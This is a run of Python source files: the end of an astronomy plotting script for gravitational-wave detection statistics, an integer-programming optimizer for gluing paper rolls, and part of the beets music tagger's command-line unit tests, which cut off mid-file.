axes[1].plot(dist_range, pdist, color='C1', linestyle='-', lw=3, zorder=2)
patch2 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C1', alpha=0.5, zorder=1)
patches.append(patch2)
legend_text.append('3 Detector Events')
mean_dist = np.mean(dist_detect3)
axes[1].axvline(mean_dist, color='C1', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
axes[1].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE since no 3-det detection")
try:
kde = spstat.gaussian_kde(dist_detect4, bw_method='scott')
pdist = kde(dist_range)
mean_dist = np.mean(dist_detect4)
axes[1].plot(dist_range, pdist, color='C2', linestyle='-', lw=3, zorder=2)
axes[1].axvline(mean_dist, color='C2', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
patch3 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C2', alpha=0.5, zorder=1)
patches.append(patch3)
legend_text.append('4 Detector Events')
axes[1].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE since no 4-det detection")
h_range = np.arange(15, 23, 0.1)
kde = spstat.gaussian_kde(hmag_detect2, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C0', linestyle='-', lw=3, zorder=4)
axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C0', alpha=0.3, zorder=0)
mean_h = np.mean(hmag_detect2)
axes[2].axvline(mean_h, color='C0', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
kde = spstat.gaussian_kde(hmag_detect3, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C1', linestyle='-', lw=3, zorder=2)
axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C1', alpha=0.5, zorder=1)
mean_h = np.mean(hmag_detect3)
axes[2].axvline(mean_h, color='C1', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
axes[2].legend(frameon=False, fontsize='small')
try:
kde = spstat.gaussian_kde(hmag_detect4, bw_method='scott')
ph = kde(h_range)
axes[2].plot(h_range, ph, color='C2', linestyle='-', lw=3, zorder=2)
        axes[2].fill_between(h_range, np.zeros(len(h_range)), ph, color='C2', alpha=0.5, zorder=1)
mean_h = np.mean(hmag_detect4)
axes[2].axvline(mean_h, color='C2', linestyle='--', lw=1.5, zorder=6, label=r'$\langle H \rangle = {:.1f}$ mag'.format(mean_h))
axes[2].legend(frameon=False, fontsize='small')
except ValueError:
print("Could not create KDE for h-mag since no 4 detector events found")
axes[1].set_xlabel('Distance ($D$, Mpc)', fontsize='large')
axes[1].set_ylabel('$P(D)$', fontsize='large')
#if args.mass_distrib != 'msp':
# axes[0].set_title(f"Masses {args.mass_distrib}; {args.masskey1} -- {args.masskey2}")
#else:
# axes[0].set_title("MSP bimodal mass @ 1.393 / 1.807 $M_{\odot}$")
axes[0].set_xlabel('Number of Events ($N$)', fontsize='large')
axes[0].set_ylabel('$P(N)$', fontsize='large')
axes[2].set_xlabel('Apparent F475W ($g$, AB mag)', fontsize='large')
axes[2].set_ylabel('$P(H)$', fontsize='large')
axes[0].set_xlim(0, ebins.max())
ymin, ymax = axes[1].get_ylim()
axes[1].set_ylim(0, ymax)
ymin, ymax = axes[2].get_ylim()
axes[2].set_ylim(0, ymax)
fig.legend(patches, legend_text,
'upper center', frameon=False, ncol=3, fontsize='medium')
fig.tight_layout(rect=[0, 0, 1, 0.97], pad=1.05)
fig.savefig(f'gw_detect_{args.mass_distrib}.pdf')
plt.show()
if __name__=='__main__':
argv = sys.argv[1:]
sys.exit(main(argv=argv))
|
the-stack_106_14771
|
"""Class to create and solve the optimization problem."""
import mip
from collections import namedtuple
CluedRole = namedtuple('CluedRole', 'roles_a, roles_b ')
def main():
"""Define main function."""
role_a = [2350, 9200, 6650, 9150]
role_b = [2300, 9150, 2850, 3650, 8250]
roles = (role_a, role_b)
costs = (2, 8)
problem = ClueRoles(roles, costs, max_roles=10, max_length=10000)
problem.solve()
class ClueRoles():
"""Define class for the optimization problem."""
def __init__(self, roles, costs=(2, 8), max_roles=20, max_length=15000):
"""Initialize object."""
self.role_a = roles[0]
self.role_b = roles[1]
self.num_a = len(self.role_a)
self.num_b = len(self.role_b)
self.costs = costs
        # costs = (cost of gluing two rolls together, cost of swapping rolls)
self.max_roles = max_roles
self.max_length = max_length
def mixed_integer_linear_program(self):
"""Generate mixed integer program."""
milp = mip.Model(sense=mip.MINIMIZE)
########################
# DEFINE VARIABLES
########################
# number of times the roles have to be changed
x_tauschen = milp.add_var(var_type=mip.INTEGER)
        # number of times two roles are glued together
x_verkleben = milp.add_var(var_type=mip.INTEGER)
        # continuous variables that determine which roles are glued together
role_a_clue = [[milp.add_var() for i in range(self.max_roles)]
for j in range(self.num_a)]
role_b_clue = [[milp.add_var() for i in range(self.max_roles)]
for j in range(self.num_b)]
# binary variables, that indicate the resulting roles
roles_in_use = [milp.add_var(var_type=mip.BINARY)
for j in range(self.max_roles)]
        # binary variables that determine which roles are glued together
binary_role_a_clued = [[milp.add_var(var_type=mip.BINARY)
for i in range(self.max_roles)]
for j in range(self.num_a)]
binary_role_b_clued = [[milp.add_var(var_type=mip.BINARY)
for i in range(self.max_roles)]
for j in range(self.num_b)]
        # gives for each resulting role the number of roles glued together
num_clued_roles_a = [milp.add_var(var_type=mip.INTEGER)
for j in range(self.max_roles)]
num_clued_roles_b = [milp.add_var(var_type=mip.INTEGER)
for j in range(self.max_roles)]
#################
# OBJECTIVE
#################
milp += x_verkleben * self.costs[0] + x_tauschen * self.costs[1]
#####################
# CONSTRAINTS
###################
part1 = mip.xsum(num_clued_roles_a[j] for j in range(self.max_roles))
part2 = mip.xsum(num_clued_roles_b[j] for j in range(self.max_roles))
milp += x_verkleben == part1 + part2
milp += x_tauschen == mip.xsum(roles_in_use[j]
for j in range(self.max_roles))
# definition domains
for j in range(self.max_roles):
for i in range(self.num_a):
milp += role_a_clue[i][j] >= 0
# milp += role_a_clue[i][j] <= 1
                # was role j used?
milp += roles_in_use[j] >= role_a_clue[i][j]
# binary variables
milp += binary_role_a_clued[i][j] >= role_a_clue[i][j]
for i in range(self.num_b):
milp += role_b_clue[i][j] >= 0
# milp += role_b_clue[i][j] <= 1
# binary variables
milp += binary_role_b_clued[i][j] >= role_b_clue[i][j]
            # number of glue joints
milp += num_clued_roles_a[j] >= 0
milp += num_clued_roles_b[j] >= 0
milp += num_clued_roles_a[j] >= mip.xsum(binary_role_a_clued[i][j]
for i in range(self.num_a)) - 1
milp += num_clued_roles_b[j] >= mip.xsum(binary_role_b_clued[i][j]
for i in range(self.num_b)) - 1
# Length restriction
milp += mip.xsum(role_a_clue[i][j] * self.role_a[i]
for i in range(self.num_a)) == mip.xsum(role_b_clue[i][j] * self.role_b[i] for i in range(self.num_b))
milp += mip.xsum(role_a_clue[i][j] * self.role_a[i]
for i in range(self.num_a)) <= self.max_length
# Every role can only be used to 100%
for i in range(self.num_a):
milp += 1 >= mip.xsum(role_a_clue[i][j]
for j in range(self.max_roles))
for i in range(self.num_b):
milp += 1 >= mip.xsum(role_b_clue[i][j]
for j in range(self.max_roles))
# use as much of the roles as possible
if sum(self.role_a) <= sum(self.role_b):
milp += sum(self.role_a) == mip.xsum(
mip.xsum(role_a_clue[i][j]*self.role_a[i]
for i in range(self.num_a))
for j in range(self.max_roles))
else:
milp += sum(self.role_b) == mip.xsum(
mip.xsum(role_b_clue[i][j]*self.role_b[i]
for i in range(self.num_b))
for j in range(self.max_roles))
return milp, role_a_clue, role_b_clue
def solve(self):
"""Solve the integer linear program."""
output = self.mixed_integer_linear_program()
milp, role_a_clue, role_b_clue = output
milp.optimize()
final_roles = []
print()
k = 0
for j in range(self.max_roles):
print([role_a_clue[i][j].x for i in range(self.num_a)])
for j in range(self.max_roles):
if sum([role_a_clue[i][j].x for i in range(self.num_a)]) >= 1e-8:
k += 1
                print(f'Roll {k}:')
clued_roles_a = []
for role in range(self.num_a):
part_a = role_a_clue[role][j].x * self.role_a[role]
clued_roles_a.append(part_a)
clued_roles_b = []
for role in range(self.num_b):
part_b = role_b_clue[role][j].x * self.role_b[role]
clued_roles_b.append(part_b)
final_roles.append(CluedRole(roles_a=clued_roles_a,
roles_b=clued_roles_b))
                print('Rolls A:')
                print(clued_roles_a)
                print('Rolls B:')
                print(clued_roles_b)
return final_roles
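# Illustrative use with a different data set (not part of the original module; the numbers are
# made up):
#
#   >>> rolls_a = [5000, 7500]
#   >>> rolls_b = [2500, 2500, 7500]
#   >>> problem = ClueRoles((rolls_a, rolls_b), costs=(2, 8), max_roles=5, max_length=10000)
#   >>> glued = problem.solve()   # list of CluedRole(roles_a=..., roles_b=...) namedtuples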
if __name__ == '__main__':
main()
|
the-stack_106_14773
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the command-line interface.
"""
from __future__ import division, absolute_import, print_function
import os
import shutil
import re
import subprocess
import platform
from copy import deepcopy
import six
import unittest
from mock import patch, Mock
from test import _common
from test.helper import capture_stdout, has_program, TestHelper, control_stdin
from beets import library
from beets import ui
from beets.ui import commands
from beets import autotag
from beets.autotag.match import distance
from beets.mediafile import MediaFile
from beets import config
from beets import plugins
from beets.util.confit import ConfigError
from beets import util
from beets.util import syspath
class ListTest(unittest.TestCase):
def setUp(self):
self.lib = library.Library(':memory:')
self.item = _common.item()
self.item.path = 'xxx/yyy'
self.lib.add(self.item)
self.lib.add_album([self.item])
def _run_list(self, query=u'', album=False, path=False, fmt=u''):
with capture_stdout() as stdout:
commands.list_items(self.lib, query, album, fmt)
return stdout
def test_list_outputs_item(self):
stdout = self._run_list()
self.assertIn(u'the title', stdout.getvalue())
def test_list_unicode_query(self):
self.item.title = u'na\xefve'
self.item.store()
self.lib._connection().commit()
stdout = self._run_list([u'na\xefve'])
out = stdout.getvalue()
if six.PY2:
out = out.decode(stdout.encoding)
self.assertTrue(u'na\xefve' in out)
def test_list_item_path(self):
stdout = self._run_list(fmt=u'$path')
self.assertEqual(stdout.getvalue().strip(), u'xxx/yyy')
def test_list_album_outputs_something(self):
stdout = self._run_list(album=True)
self.assertGreater(len(stdout.getvalue()), 0)
def test_list_album_path(self):
stdout = self._run_list(album=True, fmt=u'$path')
self.assertEqual(stdout.getvalue().strip(), u'xxx')
def test_list_album_omits_title(self):
stdout = self._run_list(album=True)
self.assertNotIn(u'the title', stdout.getvalue())
def test_list_uses_track_artist(self):
stdout = self._run_list()
self.assertIn(u'the artist', stdout.getvalue())
self.assertNotIn(u'the album artist', stdout.getvalue())
def test_list_album_uses_album_artist(self):
stdout = self._run_list(album=True)
self.assertNotIn(u'the artist', stdout.getvalue())
self.assertIn(u'the album artist', stdout.getvalue())
def test_list_item_format_artist(self):
stdout = self._run_list(fmt=u'$artist')
self.assertIn(u'the artist', stdout.getvalue())
def test_list_item_format_multiple(self):
stdout = self._run_list(fmt=u'$artist - $album - $year')
self.assertEqual(u'the artist - the album - 0001',
stdout.getvalue().strip())
def test_list_album_format(self):
stdout = self._run_list(album=True, fmt=u'$genre')
self.assertIn(u'the genre', stdout.getvalue())
self.assertNotIn(u'the album', stdout.getvalue())
class RemoveTest(_common.TestCase):
def setUp(self):
super(RemoveTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
os.mkdir(self.libdir)
# Copy a file into the library.
self.lib = library.Library(':memory:', self.libdir)
item_path = os.path.join(_common.RSRC, b'full.mp3')
self.i = library.Item.from_path(item_path)
self.lib.add(self.i)
self.i.move(True)
def test_remove_items_no_delete(self):
self.io.addinput('y')
commands.remove_items(self.lib, u'', False, False, False)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertTrue(os.path.exists(self.i.path))
def test_remove_items_with_delete(self):
self.io.addinput('y')
commands.remove_items(self.lib, u'', False, True, False)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertFalse(os.path.exists(self.i.path))
def test_remove_items_with_force_no_delete(self):
commands.remove_items(self.lib, u'', False, False, True)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertTrue(os.path.exists(self.i.path))
def test_remove_items_with_force_delete(self):
commands.remove_items(self.lib, u'', False, True, True)
items = self.lib.items()
self.assertEqual(len(list(items)), 0)
self.assertFalse(os.path.exists(self.i.path))
class ModifyTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.album = self.add_album_fixture()
[self.item] = self.album.items()
def tearDown(self):
self.teardown_beets()
def modify_inp(self, inp, *args):
with control_stdin(inp):
self.run_command('modify', *args)
def modify(self, *args):
self.modify_inp('y', *args)
# Item tests
def test_modify_item(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
self.assertEqual(item.title, u'newTitle')
def test_modify_item_abort(self):
item = self.lib.items().get()
title = item.title
self.modify_inp('n', u"title=newTitle")
item = self.lib.items().get()
self.assertEqual(item.title, title)
def test_modify_item_no_change(self):
title = u"Tracktitle"
item = self.add_item_fixture(title=title)
self.modify_inp('y', u"title", u"title={0}".format(title))
item = self.lib.items(title).get()
self.assertEqual(item.title, title)
def test_modify_write_tags(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertEqual(item.title, u'newTitle')
def test_modify_dont_write_tags(self):
self.modify(u"--nowrite", u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertNotEqual(item.title, 'newTitle')
def test_move(self):
self.modify(u"title=newTitle")
item = self.lib.items().get()
self.assertIn(b'newTitle', item.path)
def test_not_move(self):
self.modify(u"--nomove", u"title=newTitle")
item = self.lib.items().get()
self.assertNotIn(b'newTitle', item.path)
def test_no_write_no_move(self):
self.modify(u"--nomove", u"--nowrite", u"title=newTitle")
item = self.lib.items().get()
item.read()
self.assertNotIn(b'newTitle', item.path)
self.assertNotEqual(item.title, u'newTitle')
def test_update_mtime(self):
item = self.item
old_mtime = item.mtime
self.modify(u"title=newTitle")
item.load()
self.assertNotEqual(old_mtime, item.mtime)
self.assertEqual(item.current_mtime(), item.mtime)
def test_reset_mtime_with_no_write(self):
item = self.item
self.modify(u"--nowrite", u"title=newTitle")
item.load()
self.assertEqual(0, item.mtime)
def test_selective_modify(self):
title = u"Tracktitle"
album = u"album"
original_artist = u"composer"
new_artist = u"coverArtist"
for i in range(0, 10):
self.add_item_fixture(title=u"{0}{1}".format(title, i),
artist=original_artist,
album=album)
self.modify_inp('s\ny\ny\ny\nn\nn\ny\ny\ny\ny\nn',
title, u"artist={0}".format(new_artist))
original_items = self.lib.items(u"artist:{0}".format(original_artist))
new_items = self.lib.items(u"artist:{0}".format(new_artist))
self.assertEqual(len(list(original_items)), 3)
self.assertEqual(len(list(new_items)), 7)
# Album Tests
def test_modify_album(self):
self.modify(u"--album", u"album=newAlbum")
album = self.lib.albums().get()
self.assertEqual(album.album, u'newAlbum')
def test_modify_album_write_tags(self):
self.modify(u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertEqual(item.album, u'newAlbum')
def test_modify_album_dont_write_tags(self):
self.modify(u"--album", u"--nowrite", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertEqual(item.album, u'the album')
def test_album_move(self):
self.modify(u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertIn(b'newAlbum', item.path)
def test_album_not_move(self):
self.modify(u"--nomove", u"--album", u"album=newAlbum")
item = self.lib.items().get()
item.read()
self.assertNotIn(b'newAlbum', item.path)
# Misc
def test_write_initial_key_tag(self):
self.modify(u"initial_key=C#m")
item = self.lib.items().get()
mediafile = MediaFile(syspath(item.path))
self.assertEqual(mediafile.initial_key, u'C#m')
def test_set_flexattr(self):
self.modify(u"flexattr=testAttr")
item = self.lib.items().get()
self.assertEqual(item.flexattr, u'testAttr')
def test_remove_flexattr(self):
item = self.lib.items().get()
item.flexattr = u'testAttr'
item.store()
self.modify(u"flexattr!")
item = self.lib.items().get()
self.assertNotIn(u"flexattr", item)
@unittest.skip(u'not yet implemented')
def test_delete_initial_key_tag(self):
item = self.lib.items().get()
item.initial_key = u'C#m'
item.write()
item.store()
mediafile = MediaFile(syspath(item.path))
self.assertEqual(mediafile.initial_key, u'C#m')
self.modify(u"initial_key!")
mediafile = MediaFile(syspath(item.path))
self.assertIsNone(mediafile.initial_key)
def test_arg_parsing_colon_query(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle",
u"title=newTitle"])
self.assertEqual(query, [u"title:oldTitle"])
self.assertEqual(mods, {"title": u"newTitle"})
def test_arg_parsing_delete(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle",
u"title!"])
self.assertEqual(query, [u"title:oldTitle"])
self.assertEqual(dels, ["title"])
def test_arg_parsing_query_with_exclaimation(self):
(query, mods, dels) = commands.modify_parse_args([u"title:oldTitle!",
u"title=newTitle!"])
self.assertEqual(query, [u"title:oldTitle!"])
self.assertEqual(mods, {"title": u"newTitle!"})
def test_arg_parsing_equals_in_value(self):
(query, mods, dels) = commands.modify_parse_args([u"title:foo=bar",
u"title=newTitle"])
self.assertEqual(query, [u"title:foo=bar"])
self.assertEqual(mods, {"title": u"newTitle"})
class WriteTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
def tearDown(self):
self.teardown_beets()
def write_cmd(self, *args):
return self.run_with_output('write', *args)
def test_update_mtime(self):
item = self.add_item_fixture()
item['title'] = u'a new title'
item.store()
item = self.lib.items().get()
self.assertEqual(item.mtime, 0)
self.write_cmd()
item = self.lib.items().get()
self.assertEqual(item.mtime, item.current_mtime())
def test_non_metadata_field_unchanged(self):
"""Changing a non-"tag" field like `bitrate` and writing should
have no effect.
"""
# An item that starts out "clean".
item = self.add_item_fixture()
item.read()
# ... but with a mismatched bitrate.
item.bitrate = 123
item.store()
output = self.write_cmd()
self.assertEqual(output, '')
def test_write_metadata_field(self):
item = self.add_item_fixture()
item.read()
old_title = item.title
item.title = u'new title'
item.store()
output = self.write_cmd()
self.assertTrue(u'{0} -> new title'.format(old_title)
in output)
class MoveTest(_common.TestCase):
def setUp(self):
super(MoveTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
os.mkdir(self.libdir)
self.itempath = os.path.join(self.libdir, b'srcfile')
shutil.copy(os.path.join(_common.RSRC, b'full.mp3'), self.itempath)
# Add a file to the library but don't copy it in yet.
self.lib = library.Library(':memory:', self.libdir)
self.i = library.Item.from_path(self.itempath)
self.lib.add(self.i)
self.album = self.lib.add_album([self.i])
# Alternate destination directory.
self.otherdir = os.path.join(self.temp_dir, b'testotherdir')
def _move(self, query=(), dest=None, copy=False, album=False,
pretend=False, export=False):
commands.move_items(self.lib, dest, query, copy, album, pretend,
export=export)
def test_move_item(self):
self._move()
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_copy_item(self):
self._move(copy=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertExists(self.itempath)
def test_move_album(self):
self._move(album=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_copy_album(self):
self._move(copy=True, album=True)
self.i.load()
self.assertTrue(b'testlibdir' in self.i.path)
self.assertExists(self.i.path)
self.assertExists(self.itempath)
def test_move_item_custom_dir(self):
self._move(dest=self.otherdir)
self.i.load()
self.assertTrue(b'testotherdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_move_album_custom_dir(self):
self._move(dest=self.otherdir, album=True)
self.i.load()
self.assertTrue(b'testotherdir' in self.i.path)
self.assertExists(self.i.path)
self.assertNotExists(self.itempath)
def test_pretend_move_item(self):
self._move(dest=self.otherdir, pretend=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
def test_pretend_move_album(self):
self._move(album=True, pretend=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
def test_export_item_custom_dir(self):
self._move(dest=self.otherdir, export=True)
self.i.load()
self.assertEqual(self.i.path, self.itempath)
self.assertExists(self.otherdir)
def test_export_album_custom_dir(self):
self._move(dest=self.otherdir, album=True, export=True)
self.i.load()
self.assertEqual(self.i.path, self.itempath)
self.assertExists(self.otherdir)
def test_pretend_export_item(self):
self._move(dest=self.otherdir, pretend=True, export=True)
self.i.load()
self.assertIn(b'srcfile', self.i.path)
self.assertNotExists(self.otherdir)
class UpdateTest(_common.TestCase):
def setUp(self):
super(UpdateTest, self).setUp()
self.io.install()
self.libdir = os.path.join(self.temp_dir, b'testlibdir')
# Copy a file into the library.
self.lib = library.Library(':memory:', self.libdir)
item_path = os.path.join(_common.RSRC, b'full.mp3')
self.i = library.Item.from_path(item_path)
self.lib.add(self.i)
self.i.move(True)
self.album = self.lib.add_album([self.i])
# Album art.
artfile = os.path.join(self.temp_dir, b'testart.jpg')
_common.touch(artfile)
self.album.set_art(artfile)
self.album.store()
os.remove(artfile)
def _update(self, query=(), album=False, move=False, reset_mtime=True,
fields=None):
self.io.addinput('y')
if reset_mtime:
self.i.mtime = 0
self.i.store()
commands.update_items(self.lib, query, album, move, False,
fields=fields)
def test_delete_removes_item(self):
self.assertTrue(list(self.lib.items()))
os.remove(self.i.path)
self._update()
self.assertFalse(list(self.lib.items()))
def test_delete_removes_album(self):
self.assertTrue(self.lib.albums())
os.remove(self.i.path)
self._update()
self.assertFalse(self.lib.albums())
def test_delete_removes_album_art(self):
artpath = self.album.artpath
self.assertExists(artpath)
os.remove(self.i.path)
self._update()
self.assertNotExists(artpath)
def test_modified_metadata_detected(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update()
item = self.lib.items().get()
self.assertEqual(item.title, u'differentTitle')
def test_modified_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update(move=True)
item = self.lib.items().get()
self.assertTrue(b'differentTitle' in item.path)
def test_modified_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
self._update(move=False)
item = self.lib.items().get()
self.assertTrue(b'differentTitle' not in item.path)
def test_selective_modified_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['title'])
item = self.lib.items().get()
self.assertTrue(b'differentTitle' in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_selective_modified_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.genre = u'differentGenre'
mf.save()
self._update(move=False, fields=['title'])
item = self.lib.items().get()
self.assertTrue(b'differentTitle' not in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_modified_album_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.save()
self._update(move=True)
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' in item.path)
def test_modified_album_metadata_art_moved(self):
artpath = self.album.artpath
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.save()
self._update(move=True)
album = self.lib.albums()[0]
self.assertNotEqual(artpath, album.artpath)
def test_selective_modified_album_metadata_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['album'])
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' in item.path)
self.assertNotEqual(item.genre, u'differentGenre')
def test_selective_modified_album_metadata_not_moved(self):
mf = MediaFile(syspath(self.i.path))
mf.album = u'differentAlbum'
mf.genre = u'differentGenre'
mf.save()
self._update(move=True, fields=['genre'])
item = self.lib.items().get()
self.assertTrue(b'differentAlbum' not in item.path)
self.assertEqual(item.genre, u'differentGenre')
def test_mtime_match_skips_update(self):
mf = MediaFile(syspath(self.i.path))
mf.title = u'differentTitle'
mf.save()
# Make in-memory mtime match on-disk mtime.
self.i.mtime = os.path.getmtime(self.i.path)
self.i.store()
self._update(reset_mtime=False)
item = self.lib.items().get()
self.assertEqual(item.title, u'full')
class PrintTest(_common.TestCase):
def setUp(self):
super(PrintTest, self).setUp()
self.io.install()
def test_print_without_locale(self):
lang = os.environ.get('LANG')
if lang:
del os.environ['LANG']
try:
ui.print_(u'something')
except TypeError:
self.fail(u'TypeError during print')
finally:
if lang:
os.environ['LANG'] = lang
def test_print_with_invalid_locale(self):
old_lang = os.environ.get('LANG')
os.environ['LANG'] = ''
old_ctype = os.environ.get('LC_CTYPE')
os.environ['LC_CTYPE'] = 'UTF-8'
try:
ui.print_(u'something')
except ValueError:
self.fail(u'ValueError during print')
finally:
if old_lang:
os.environ['LANG'] = old_lang
else:
del os.environ['LANG']
if old_ctype:
os.environ['LC_CTYPE'] = old_ctype
else:
del os.environ['LC_CTYPE']
class ImportTest(_common.TestCase):
def test_quiet_timid_disallowed(self):
config['import']['quiet'] = True
config['import']['timid'] = True
self.assertRaises(ui.UserError, commands.import_files, None, [],
None)
@_common.slow_test()
class ConfigTest(unittest.TestCase, TestHelper, _common.Assertions):
def setUp(self):
self.setup_beets()
# Don't use the BEETSDIR from `helper`. Instead, we point the home
# directory there. Some tests will set `BEETSDIR` themselves.
del os.environ['BEETSDIR']
self._old_home = os.environ.get('HOME')
os.environ['HOME'] = util.py3_path(self.temp_dir)
# Also set APPDATA, the Windows equivalent of setting $HOME.
self._old_appdata = os.environ.get('APPDATA')
os.environ['APPDATA'] = \
util.py3_path(os.path.join(self.temp_dir, b'AppData', b'Roaming'))
self._orig_cwd = os.getcwd()
self.test_cmd = self._make_test_cmd()
commands.default_commands.append(self.test_cmd)
# Default user configuration
if platform.system() == 'Windows':
self.user_config_dir = os.path.join(
self.temp_dir, b'AppData', b'Roaming', b'beets'
)
else:
self.user_config_dir = os.path.join(
self.temp_dir, b'.config', b'beets'
)
os.makedirs(self.user_config_dir)
self.user_config_path = os.path.join(self.user_config_dir,
b'config.yaml')
# Custom BEETSDIR
self.beetsdir = os.path.join(self.temp_dir, b'beetsdir')
os.makedirs(self.beetsdir)
self._reset_config()
def tearDown(self):
commands.default_commands.pop()
os.chdir(self._orig_cwd)
if self._old_home is not None:
os.environ['HOME'] = self._old_home
if self._old_appdata is None:
del os.environ['APPDATA']
else:
os.environ['APPDATA'] = self._old_appdata
self.teardown_beets()
def _make_test_cmd(self):
test_cmd = ui.Subcommand('test', help=u'test')
def run(lib, options, args):
test_cmd.lib = lib
test_cmd.options = options
test_cmd.args = args
test_cmd.func = run
return test_cmd
def _reset_config(self):
# Config should read files again on demand
config.clear()
config._materialized = False
def write_config_file(self):
return open(self.user_config_path, 'w')
def test_paths_section_respected(self):
with self.write_config_file() as config:
config.write('paths: {x: y}')
self.run_command('test', lib=None)
key, template = self.test_cmd.lib.path_formats[0]
self.assertEqual(key, 'x')
self.assertEqual(template.original, 'y')
def test_default_paths_preserved(self):
default_formats = ui.get_path_formats()
self._reset_config()
with self.write_config_file() as config:
config.write('paths: {x: y}')
self.run_command('test', lib=None)
key, template = self.test_cmd.lib.path_formats[0]
self.assertEqual(key, 'x')
self.assertEqual(template.original, 'y')
self.assertEqual(self.test_cmd.lib.path_formats[1:],
default_formats)
def test_nonexistant_db(self):
with self.write_config_file() as config:
config.write('library: /xxx/yyy/not/a/real/path')
with self.assertRaises(ui.UserError):
self.run_command('test', lib=None)
def test_user_config_file(self):
with self.write_config_file() as file:
file.write('anoption: value')
self.run_command('test', lib=None)
self.assertEqual(config['anoption'].get(), 'value')
def test_replacements_parsed(self):
with self.write_config_file() as config:
config.write("replace: {'[xy]': z}")
self.run_command('test', lib=None)
replacements = self.test_cmd.lib.replacements
self.assertEqual(replacements, [(re.compile(u'[xy]'), 'z')])
def test_multiple_replacements_parsed(self):
with self.write_config_file() as config:
config.write("replace: {'[xy]': z, foo: bar}")
self.run_command('test', lib=None)
replacements = self.test_cmd.lib.replacements
self.assertEqual(replacements, [
(re.compile(u'[xy]'), u'z'),
(re.compile(u'foo'), u'bar'),
])
def test_cli_config_option(self):
config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(config_path, 'w') as file:
file.write('anoption: value')
self.run_command('--config', config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'value')
def test_cli_config_file_overwrites_user_defaults(self):
with open(self.user_config_path, 'w') as file:
file.write('anoption: value')
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('anoption: cli overwrite')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'cli overwrite')
def test_cli_config_file_overwrites_beetsdir_defaults(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('anoption: value')
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('anoption: cli overwrite')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assertEqual(config['anoption'].get(), 'cli overwrite')
# @unittest.skip('Difficult to implement with optparse')
# def test_multiple_cli_config_files(self):
# cli_config_path_1 = os.path.join(self.temp_dir, b'config.yaml')
